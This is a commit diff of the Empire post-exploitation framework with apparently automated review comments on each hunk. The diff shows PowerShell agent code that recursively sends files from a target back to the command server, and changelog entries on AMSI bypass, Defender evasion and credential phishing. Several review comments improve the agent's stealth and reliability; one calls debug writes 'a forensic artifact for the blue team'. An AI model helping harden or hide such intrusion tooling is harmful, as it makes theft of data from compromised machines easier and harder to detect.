...
 
Commits (6)
......@@ -11,7 +11,9 @@ LastTask*
data/obfuscated_module_source/*.ps1
data/misc/ToObfuscate.ps1
data/misc/Obfuscated.ps1
setup/xar/
setup/xar*/
setup/bomutils/
.venv
.DS_Store
venv/
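Review bot: `.venv` has no trailing slash, so unlike `venv/` it also matches a plain file named `.venv`; use `.venv/` for consistency with the `venv/` entry two lines below. `setup/xar*/` now also covers an unpacked `setup/xar-<version>/` directory, which looks intended, but `setup/xar/` on the line above becomes redundant once the glob is in place.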
# NOTE: Only use this when you want to build image locally
# else use `docker pull empireproject\empire:{VERSION}`
# else use `docker pull empireproject/empire:{VERSION}`
# all image versions can be found at: https://hub.docker.com/r/empireproject/empire/
# -----BUILD COMMANDS----
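Review bot: the comment now points at the `empireproject/empire` Hub image and the upstream tag list, but the README in this same commit clones `BC-SECURITY/Empire` (`git clone https://github.com/BC-SECURITY/Empire.git --branch dev`); if this fork does not publish its own image, say explicitly that `docker pull empireproject/empire:{VERSION}` gives you the upstream 2.x build and not the 3.0 beta described below, otherwise point the comment at the fork's image.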
......@@ -45,6 +45,8 @@ RUN apt-get update && apt-get install -qy \
apt-utils \
lsb-core \
python2.7 \
python-dev \
&& ln -sf /usr/bin/python2.7 /usr/bin/python \
&& rm -rf /var/lib/apt/lists/*
# build empire from source
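Review bot: `ln -sf /usr/bin/python2.7 /usr/bin/python` pins the image's `python` to 2.7 while the point of this commit is 2.x/3.x compatibility, so the container never exercises the 3.x path and the `python-dev` headers added on the previous line are the 2.7 ones. Either install `python3`/`python3-dev` as well and run the Python 3 interpreter explicitly in `ENTRYPOINT`, or state in the comment that the image is deliberately a Python 2.7 build.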
......@@ -53,8 +55,6 @@ RUN git clone --depth=1 -b dev https://github.com/EmpireProject/Empire.git /opt/
cd /opt/Empire/setup/ && \
./install.sh && \
rm -rf /opt/Empire/data/empire*
RUN python2.7 /opt/Empire/setup/setup_database.py
WORKDIR "/opt/Empire"
ENTRYPOINT ["./empire"]
# -----END OF BUILD-----
CMD ["python2.7", "empire"]
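Review bot: dropping `RUN python2.7 /opt/Empire/setup/setup_database.py` immediately after `rm -rf /opt/Empire/data/empire*` means the image is built with no database file; unless `./empire` (the new `ENTRYPOINT`) creates `data/empire.db` on first start, the container fails as soon as it is run. If `install.sh` already creates the database, the `rm -rf` line deletes it again, so one of the two lines has to go, and a comment should say which step owns database creation. Separately, the `git clone` in this hunk's header still pulls `EmpireProject/Empire.git`, not `BC-SECURITY/Empire`, so the image does not build the code this commit is changing.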
# Empire
![Empire](https://user-images.githubusercontent.com/20302208/70022749-1ad2b080-154a-11ea-9d8c-1b42632fd9f9.jpg)
[1.1]: http://i.imgur.com/tXSoThF.png (twitter icon with padding)
[2.1]: http://i.imgur.com/P3YfQoD.png (facebook icon with padding)
[3.1]: http://i.imgur.com/yCsTjba.png (google plus icon with padding)
[4.1]: http://i.imgur.com/YckIOms.png (tumblr icon with padding)
[5.1]: http://i.imgur.com/1AGmwO3.png (dribbble icon with padding)
[6.1]: http://i.imgur.com/0o48UoR.png (github icon with padding)
[1]: https://twitter.com/bcsecurity1
[2]: http://www.facebook.com/XXXXXXX
[3]: https://plus.google.com/XXXXXXX
[4]: http://XXXXXXX.tumblr.com
[5]: http://dribbble.com/XXXXXXX
[6]: http://www.github.com/BC-SECURITY
[7]: https://www.bc-security.org/blog
Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016.
![GitHub contributors](https://img.shields.io/github/contributors/BC-SECURITY/Empire)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/BC-SECURITY/Empire)
![GitHub stars](https://img.shields.io/github/stars/BC-SECURITY/Empire)
![GitHub](https://img.shields.io/github/license/BC-Security/Empire)
[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/fold_left.svg?style=flat)](https://twitter.com/BCSecurity1)
Keep up-to-date on our blog at [https://www.bc-security.org/blog][7]
# Empire
## The beta release of [Empire 3.0](https://github.com/BC-SECURITY/Empire/tree/dev) is available on the dev branch ##
Empire 3.0 is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent, and compatibility with Python 2.x/3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016. BC-Security presented updates to further evade Microsoft Antimalware Scan Interface (AMSI) and JA3/S signatures at [DEF CON 27](https://github.com/BC-SECURITY/DEFCON27).
Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.
Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior).
Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), [@xorrior](https://twitter.com/xorrior), and [@bcsecurity1](https://twitter.com/BCSecurity1). While the main fork for Empire is no longer maintained, this fork is maintained by [BC-Security](https://www.bc-security.org) and will continue to receive periodic updates.
Feel free to join us on Slack! http://adaptiveempire.slack.com/
## Release Notes
With the release of the 3.0 beta, there are some major upgrades to Empire. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors.
We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. There are still many modules that need to be tested, hence the beta release.
In addition to the code conversion, there are some minor UI updates, a few new modules, and new functionality. The full list of changes can be reviewed in the changelog.
## Install
To install, run `sudo ./setup/install.sh` script or use the corresponding docker image `docker pull empireproject/empire`.
To install and run:
```sh
git clone https://github.com/BC-SECURITY/Empire.git --branch dev
cd Empire
sudo ./setup/install.sh
```
There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) and full [documentation here](http://www.powershellempire.com/?page_id=83).
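Review bot: the rewritten 3.0 intro carries over the typo `premeiered` (premiered) from the old paragraph, and the acknowledgement sentence `If we have failed to improperly cite existing or prior work` says the opposite of what is meant (`failed to properly cite`). The link references `[2]` to `[5]` (facebook, plus.google, tumblr, dribbble) are still `XXXXXXX` placeholders and should be removed or filled in. In the release notes, `as well as, there being several new updates` needs rewording (`and several new features have been added`). The Install section says `docker pull empireproject/empire` while the clone command targets `BC-SECURITY/Empire`; if the fork has no image of its own, say so here, since the Dockerfile in this commit also still clones `EmpireProject/Empire`.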
......@@ -18,16 +54,28 @@ There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) a
Check out the [Empire wiki](https://github.com/EmpireProject/Empire/wiki/Quickstart) for instructions on getting started with Empire.
## To Do List
* Port code to work with Python 3
* [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy)
* Function name randomization
* JA3/S signature randomization
* Multi-menu function calls
* Function name aliasing
* Update to [Mimikatz 2.2.0](https://github.com/gentilkiwi/mimikatz)
## Contribution Rules
Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
* Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative.
* Beginning with version 3.0, we will require that all updates be both Python 2.x/3.x compatible.
* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
* Depending on what you're working on, base your module on [./lib/modules/powershell_template.py](lib/modules/powershell_template.py) or [./lib/modules/python_template.py](lib/modules/python_template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
* Cite previous work in the **'Comments'** module section.
* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
* TEST YOUR MODULE! Be sure to run it from an Empire agent and test both Python 2.x/3.x functionality before submitting a pull to ensure everything is working correctly.
* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
[![alt text][1.1]][1]
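Review bot: the To Do list still opens with `Port code to work with Python 3` although the new contribution rule below requires 2.x/3.x compatibility and the changelog entry in this commit says that compatibility was added; the same applies to `Update to Mimikatz 2.2.0`, which the changelog lists as done (`Updated mimikatz binary in Invoke-Mimikatz to version 2.2.0 20190408`). Drop or reword both. `Submit pull requests to the dev branch` links to `powershellempire/Empire/tree/dev`, and the wiki link at the top of the hunk to `EmpireProject/Empire/wiki`; both should point at `BC-SECURITY/Empire`, otherwise contributors open PRs against the unmaintained fork this README says is no longer maintained.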
11/26/2019
------------
- Version 3.0 Beta Release
- Added Python 2.6/7 and 3.x compatibility (@Cx01N, @Hubbl3, @Vinnybod)
- Improved Windows Defender Evasion
- Updated mimikatz binary in Invoke-Mimikatz to version 2.2.0 20190408 (@Cx01N)
- Fixed port assignment feature to listeners (@Cx01N)
- Fixed issues with http_Hop listener (@Cx01N)
- Fixed issues with redirector listener (@Cx01N)
- Fixed typos in default http listener payloads (@Hubbl3)
- Fixed psinject AV recognition (@Hubbl3)
- Updated Invoke-Obfuscation to version 1.8 (@phra)
- Updated Invoke-Kerberoast (@Zero1t0)
- Added ability to uselisteners on main menu (@Cx01N, @Hubbl3)
- Added Get-Subnet_Ranges (@benichmt1)
- Added Get-WinUpdates (@classity)
- Added Get-KerberosServiceTIcket (@OneLogicalMyth)
- Added Invoke-RID_Hijack (@r4wd3r)
- Added Invoke-internal_monologue (@audibleblink)
- Added Invoke-SMBLogin (@mvelazc0)
- Added Sherlock (@_RastaMouse, @audibleblink)
- Added Outlook Sandbox Evasion for Windows Macro launcher (@Cx01N, @Hubbl3)
- Added Randomized JA3S signature (@Hubbl3)
- Added AMSI Bypass based on Tal Liberman's AMSI Bypass (@Hubbl3)
- Added Invoke-CredentialPhisher (@quickbreach)
- Made Security Bypasses configurable for launchers (@phra)
- Updated Readme to include install instruction, EOL of Core Devloper support, new contribution rules
- Added OSX shellcode stager (@johneiser)
- Added Invoke-Phant0m (@leesoh)
- Added Get-AppLockerConfig (@matterpreter)
- Added HostRecon (@RootUp)
- Added more informative PS agent directory listing (@winnie22)
Credit was given based on Commit Author if something is credited incorrectly or we missed an update
please contact us at info@bc-security.org
03/15/2018
------------
- Version 2.5 Master Release
- Patched launcher generation bug
- Patched launcher generation bug
- Added OSX Mic record module #893 (@s0lst1c3)
- More robust password handling in ssh_command and ssh_launcher modules (@retro-engineer)
- Updated server responses for http listener (@xorrior)
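Review bot: typos in the new 3.0 entry: `uselisteners` (use listeners), `Get-KerberosServiceTIcket` (Ticket), `Devloper` (Developer), and `Windows Defender Evasion` is the only bullet without an author credit, which the closing line says were derived from commit authors. That closing credit line is one run-on; split it: `Credit was given based on commit author. If something is credited incorrectly or we missed an update, please contact us at info@bc-security.org`. Under 03/15/2018, `Patched launcher generation bug` appears twice; drop the duplicate unless they were distinct fixes, in which case say which launcher each one touched.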
......@@ -12,7 +47,7 @@
- Overhaul events system to provide more descriptive messages and accurate logging of events (@DakotaNelson)
- Added macro that backdoors lnk files (@G0ldenGunSec)
- Bug fix for invoke_psexec module when using custom commands (@ThePirateWhoSmellsOfSunflowers)
- Added capability to generate a vs studio project file to generate a csharp launcher (@elitest)
- Added capability to generate a vs studio project file to compile a csharp executable/launcher (@elitest)
- Added capability to enable/disable/delete listeners (@mr64bit)
- Added report generation (@bneg)
- Updated http_com listener to server IIS7 default page and added response headers to evade nessus scans (@s0lst1c3)
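Review bot: `Updated http_com listener to server IIS7 default page` should read `serve`, and `vs studio project file` should be `Visual Studio project file` in the reworded csharp launcher bullet.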
......
......@@ -124,10 +124,12 @@ function Invoke-Empire {
# uris(comma separated)|UserAgent|header1=val|header2=val2...
# headers are optional. format is "key:value"
# ex- cookies are "cookie:blah=123;meh=456"
Add-Content c:\test.txt $Profile
$ProfileParts = $Profile.split('|')
$script:TaskURIs = $ProfileParts[0].split(',')
$script:UserAgent = $ProfileParts[1]
$script:SessionID = $SessionID
Add-Content c:\test.txt $SessionID
$script:Headers = @{}
# add any additional request headers if there are any specified in the profile
if($ProfileParts[2]) {
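Review bot: `Add-Content c:\test.txt $Profile` and `Add-Content c:\test.txt $SessionID` are debug leftovers that must not ship in the agent: they write the C2 profile (task URIs, User-Agent, custom headers) and the agent's session ID in cleartext to a fixed path on the target, which is both a forensic artifact for the blue team and a leak of the agent's identity, and on hosts where the current user cannot write to `C:\` the calls error into the task output. Remove them here and in the profile-update function further down, which has the same two lines.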
......@@ -279,20 +281,20 @@ function Invoke-Empire {
}
else {
switch -regex ($cmd) {
'(ls|dir)' {
'(ls|^dir)' {
if ($cmdargs.length -eq "") {
$output = Get-ChildItem -force | select lastwritetime,length,name
$output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner }},lastwritetime,length,name
}
else {
try{
$output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name"
$output = IEX "$cmd $cmdargs -Force -ErrorAction Stop" | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
}
catch [System.Management.Automation.ActionPreferenceStopException] {
$output = "[!] Error: $_ (or cannot be accessed)."
}
}
}
'(mv|move|copy|cp|rm|del|rmdir)' {
'(mv|move|copy|cp|rm|del|rmdir|mkdir)' {
if ($cmdargs.length -ne "") {
try {
IEX "$cmd $cmdargs -Force -ErrorAction Stop"
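Review bot: only the `dir` alternative was anchored (`'(ls|^dir)'`); `ls` is still unanchored and neither pattern has a `$`, so any command word containing `ls` still lands in this branch, and `mkdir` (newly added to the second pattern) stays out of the first only because of the `^dir` anchor. Anchor both patterns fully, e.g. `'^(ls|dir)$'` and `'^(mv|move|copy|cp|rm|del|rmdir|mkdir)$'`, and remember that `switch -regex` evaluates every matching case unless each block ends in `break`. The new `Owner` column runs `Get-Acl` on every entry; that throws on items the user cannot read and, on a large directory, turns a cheap listing into one ACL query per file. At minimum pass `-ErrorAction SilentlyContinue` inside the expression so a single unreadable entry does not abort the whole `select`.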
......@@ -441,6 +443,8 @@ function Invoke-Empire {
param($JobName)
if($Script:Jobs.ContainsKey($JobName)) {
$Script:Jobs[$JobName]['Buffer'].ReadAll()
$Script:Jobs[$JobName]['PSHost'].Streams.Error
$Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
}
}
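Review bot: `$Script:Jobs[$JobName]['PSHost'].Streams.Error` emits `ErrorRecord` objects into the same output stream as the text returned by `Buffer.ReadAll()`, so the task result is a mix of strings and objects; pipe the error stream through `Out-String` (or `ForEach-Object { $_.ToString() }`) so it serialises as text, and guard with `if ($Script:Jobs[$JobName]['PSHost'].Streams.Error.Count -gt 0)` so a clean job does not append an empty collection. The same two lines are duplicated in the stop-job path in the next hunk; factor them into a small helper.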
......@@ -453,6 +457,8 @@ function Invoke-Empire {
$Null = $Script:Jobs[$JobName]['PSHost'].Stop()
# get results
$Script:Jobs[$JobName]['Buffer'].ReadAll()
$Script:Jobs[$JobName]['PSHost'].Streams.Error
$Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
# unload the app domain runner
$Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain'])
$Script:Jobs.Remove($JobName)
......@@ -467,7 +473,8 @@ function Invoke-Empire {
# uris(comma separated)|UserAgent|header1=val|header2=val2...
# headers are optional. format is "key:value"
# ex- cookies are "cookie:blah=123;meh=456"
Add-Content c:\test.txt "Update Profile"
Add-Content c:\test.txt $Profile
$ProfileParts = $Profile.split('|')
$script:TaskURIs = $ProfileParts[0].split(',')
$script:UserAgent = $ProfileParts[1]
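Review bot: same debug leftovers as in the first hunk: `Add-Content c:\test.txt "Update Profile"` and `Add-Content c:\test.txt $Profile` write the updated C2 profile to disk on the target every time the profile changes. Remove before merge.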
......@@ -840,37 +847,39 @@ function Invoke-Empire {
$ChunkSize = 1024KB
}
# resolve the complete path
$Path = Get-Childitem $Path | ForEach-Object {$_.FullName}
# read in and send the specified chunk size back for as long as the file has more parts
$Index = 0
do{
$EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
if($EncodedPart) {
$data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
Send-Message -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID)
$Index += 1
# if there are more parts of the file, sleep for the specified interval
if ($script:AgentDelay -ne 0) {
$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
$max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
if ($min -eq $max) {
$sleepTime = $min
}
else{
$sleepTime = Get-Random -minimum $min -maximum $max;
# resolve the complete paths
$Path = Get-Childitem -Recurse $Path -File | ForEach-Object {$_.FullName}
foreach ( $File in $Path) {
# read in and send the specified chunk size back for as long as the file has more parts
$Index = 0
do{
$EncodedPart = Get-FilePart -File "$file" -Index $Index -ChunkSize $ChunkSize
if($EncodedPart) {
$data = "{0}|{1}|{2}" -f $Index, $file, $EncodedPart
(& $SendMessage -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID))
$Index += 1
# if there are more parts of the file, sleep for the specified interval
if ($script:AgentDelay -ne 0) {
$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
$max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
if ($min -eq $max) {
$sleepTime = $min
}
else{
$sleepTime = Get-Random -minimum $min -maximum $max;
}
Start-Sleep -s $sleepTime;
}
Start-Sleep -s $sleepTime;
}
}
[GC]::Collect()
} while($EncodedPart)
[GC]::Collect()
} while($EncodedPart)
Encode-Packet -type 40 -data "[*] File download of $path completed" -ResultID $ResultID
Encode-Packet -type 40 -data "[*] File download of $file completed" -ResultID $ResultID
}
}
catch {
Encode-Packet -type 0 -data '[!] File does not exist or cannot be accessed' -ResultID $ResultID
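Review bot: `Get-Childitem -Recurse $Path -File` uses the `-File` switch, which does not exist in PowerShell 2.0 (it was added in 3.0), so on a v2 host the call throws and the `catch` below reports `File does not exist or cannot be accessed` for every download; the README in this commit still says v2 compatibility is strongly preferred. Use `Get-ChildItem -Recurse $Path | Where-Object { -not $_.PSIsContainer }` instead. With recursion, a `$Path` that resolves to a directory now streams every file beneath it with no count or size cap, so `download C:\` will pull the whole drive one chunk at a time; report the file count (and ideally total size) in a packet before sending and let the operator confirm. Finally, `Send-Message` was replaced by `(& $SendMessage ...)`; confirm `$SendMessage` is defined in this scope, because an undefined script block here is caught by the same `catch` and shows up as a missing-file error.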
......
......@@ -3,6 +3,12 @@ Implements AES in python as a jinja2 partial.
AES code from https://github.com/ricmoo/pyaes
"""
from builtins import bytes
from builtins import chr
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
import copy
import struct
import hashlib
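Review bot: `from builtins import bytes, chr, zip, str, range, object` resolves to the stdlib `builtins` on Python 3 but to the third-party `future` package on Python 2; `future` is not part of a stock 2.7 install, so either add it to the installer/requirements or the 2.7 path fails at import. Because this file is rendered as a Jinja2 partial into the Python agent, the same applies on the target host: a 2.7 target without `future` cannot stage. If that dependency is unacceptable for the agent, guard the import with `try/except ImportError` and fall back to the 2.x builtins.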
......@@ -109,19 +115,19 @@ class AES(object):
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
self._Ke = [[0] * 4 for i in range(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
self._Kd = [[0] * 4 for i in range(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in range(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
for i in range(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
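Review bot: `struct.unpack('>i', key[i:i + 4])` requires `key` to be `bytes` on Python 3; a caller that passes a `str` (for example a staging key read straight from the listener config) gets a `TypeError` from `struct`. Normalise once at the constructor boundary (`if not isinstance(key, bytes): key = key.encode('latin-1')`) rather than relying on every caller, and note that `'>i'` is signed, so the round-key words can be negative ints; that is consistent with the upstream pyaes code but worth a comment for the next person converting this file.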
......@@ -139,12 +145,12 @@ class AES(object):
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
for i in range(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
for i in range(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
......@@ -153,7 +159,7 @@ class AES(object):
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
for i in range(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
......@@ -165,8 +171,8 @@ class AES(object):
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
for r in range(1, rounds):
for j in range(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
......@@ -184,11 +190,11 @@ class AES(object):
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -198,7 +204,7 @@ class AES(object):
# The last round is special
result = []
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......@@ -218,11 +224,11 @@ class AES(object):
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -232,7 +238,7 @@ class AES(object):
# The last round is special
result = []
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......@@ -252,11 +258,11 @@ def decrypt(self, ciphertext):
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -266,7 +272,7 @@ def decrypt(self, ciphertext):
# The last round is special
result = [ ]
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......
""" Implements Diffie-Hellman as a Jinja2 partial for use in stagers
DH code from: https://github.com/lowazo/pyDHE """
from __future__ import print_function
from builtins import bytes
from builtins import str
from builtins import object
import os
import hashlib
......@@ -65,7 +69,7 @@ class DiffieHellman(object):
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694
DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
if group in list(primes.keys()):
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
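Review bot: `if group in list(primes.keys())` builds a list just to do a membership test; `if group in primes:` is O(1) and works on both Python versions. Also, an unknown `group` only prints a message and then continues with the default prime, so a typo in a listener's DH group silently changes the key size; raise or return an explicit error instead of falling through.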
......
......@@ -53,10 +53,9 @@ def get_sysinfo(nonce='00000000'):
language = 'python'
cmd = 'ps %s' % (os.getpid())
